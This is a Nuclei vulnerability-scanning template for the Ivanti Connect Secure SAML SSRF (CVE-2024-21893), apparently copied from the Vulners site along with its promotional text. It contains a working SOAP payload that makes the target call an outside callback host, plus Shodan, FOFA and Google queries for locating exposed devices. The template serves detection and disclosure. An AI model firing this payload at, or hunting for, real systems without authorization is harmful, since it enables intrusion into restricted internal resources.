id: CVE-2024-21893
info:
name: Ivanti SAML - Server Side Request Forgery (SSRF)
author: DhiyaneshDk
severity: high
description: |
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
impact: |
Unauthenticated attackers can perform SSRF attacks to access restricted internal resources and bypass authentication mechanisms.
remediation: |
Update Ivanti Connect Secure, Policy Secure, and Neurons for ZTA to the latest patched versions.
reference:
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
- https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
- https://github.com/Ostorlab/KEV
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-21893
cwe-id: CWE-918
epss-score: 0.99999
epss-percentile: 0.99999
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ivanti
product: connect_secure
shodan-query:
- "html:\"welcome.cgi?p=logo\""
- http.title:"ivanti connect secure"
- http.html:"welcome.cgi?p=logo"
fofa-query:
- body="welcome.cgi?p=logo"
- title="ivanti connect secure"
google-query: intitle:"ivanti connect secure"
tags: cve,cve2024,kev,ssrf,ivanti,vkev,vuln
http:
- raw:
- |
POST /dana-ws/saml20.ws HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 4a0a0047304502207c1465bb6148b0ccdc6d24f7eafce0a481dccefb8e60efa4a444456389622d52022100dccd2c181c0ecedbd6789612fe0fddba7eff737696f09fda5771ac904ff98b32:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation